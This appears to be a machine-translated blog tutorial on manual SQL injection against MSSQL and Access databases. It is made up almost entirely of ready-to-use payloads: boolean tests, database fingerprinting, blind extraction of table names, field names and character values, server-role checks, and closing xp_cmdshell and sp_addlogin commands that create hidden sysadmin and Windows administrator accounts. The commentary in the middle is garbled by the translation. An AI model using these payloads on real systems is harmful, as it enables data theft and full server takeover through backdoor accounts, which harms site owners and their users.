1. Determine if there is an injection
and 1=1
and 1=2
The method of judging injection is the same
2. Preliminary judgment whether it is MSSQL
and user>0
3. Judging the database system
and (select COUNT (*) from sysobjects) >0 MSSQL
and (select COUNT (*) from msysobjects) >0 access
4. The injection parameter is a character
' AND [query condition] and ' = '
5. No filter parameters during the search
' AND [query condition] and '%25 ' = '
6. Guess the name of the tables
and (select Count (*) from [table name]) >0
This comparison of egg pain, a total of 3oo more than one database I did not guess, there are artifacts sqlmap run are not finished, just returned error, if the correct table name on the line, the following is guessing field, in fact, and Access database poor understand, learn this will have to extrapolate, this is some steps and statements, I give everyone to see it, mainly this station compared to the egg pain, the use of the tool will be introduced in the future tutorial, learn this to learn the principle, only know with the tools injected also have no meaning, to learn the principle, have their own ideas, and then write their own tools to achieve the sense of accomplishment
7. Guessing fields
and (select Count (field name) from table name) >0
8. Guess the length of the record in the field
and (select top 1 len (field name) from table name) >0
9. (1) Guess the ASCII value of the field (access)
and (select top 1 ASC (Mid (field name, top)) from table name) >0
(2) Guess the ASCII value of the field (MSSQL)
and (select top 1 Unicode (substring (field name, top)) from table name) >0
10. Test permission structure (MSSQL)
and 1= (select Is_srvrolemember (' sysadmin '));--
and 1= (select Is_srvrolemember (' serveradmin '));--
and 1= (select Is_srvrolemember (' setupadmin '));--
and 1= (select Is_srvrolemember (' securityadmin '));--
and 1= (select Is_srvrolemember (' diskadmin '));--
and 1= (select Is_srvrolemember (' bulkadmin '));--
and 1= (select Is_member (' db_owner '));--
11. Add the MSSQL and system account
EXEC master.dbo.sp_addlogin username;--
EXEC Master.dbo.sp_password null,username,password;--
EXEC master.dbo.sp_addsrvrolemember sysadmin username;--
EXEC master.dbo.xp_cmdshell ' net user username password/workstations:*/times:all/passwordchg:yes/passwordreq:yes/ Active:yes/add ';--
EXEC master.dbo.xp_cmdshell ' net user username Password/add ';
EXEC master.dbo.xp_cmdshell ' net localgroup Administrators Username/add ';--
This article from "RedBull" blog, reproduced please contact the author!
SQL Server Manual Injection Tutorial